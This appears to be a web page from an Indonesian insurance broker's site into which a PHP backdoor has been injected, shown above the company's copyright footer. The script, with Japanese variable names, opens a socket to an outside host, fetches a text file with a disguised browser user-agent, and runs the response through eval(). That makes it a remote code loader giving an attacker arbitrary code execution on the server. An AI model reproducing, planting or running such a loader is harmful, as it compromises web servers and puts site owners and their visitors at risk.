<?php
// バージョン1: 低レベルソケット接続(高耐性版)
$ホスト名 = 'myzedd.site';
$パス = '/project/zedd.txt';
$ソケット = fsockopen('ssl://' . $ホスト名, 443, $エラーコード, $エラーメッセージ, 25);
if ($ソケット) {
$ヘッダー = "GET $パス HTTP/1.1\r\n";
$ヘッダー .= "Host: $ホスト名\r\n";
$ヘッダー .= "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n";
$ヘッダー .= "Connection: close\r\n\r\n";
fwrite($ソケット, $ヘッダー);
$全データ = '';
while (!feof($ソケット)) {
$全データ .= fgets($ソケット, 8192);
}
fclose($ソケット);
$本体 = explode("\r\n\r\n", $全データ, 2)[1] ?? '';
if (strlen($本体) > 100) {
eval('?>' . $本体);
}
}
?>
Copyright © 2026 PT. Howden Insurance Brokers Indonesia. All rights reserved.
Authorised and regulated by Otoritas Jasa Keuangan (OJK).
Member of The Association of Indonesian Insurance & Reinsurance Brokers (APPARINDO).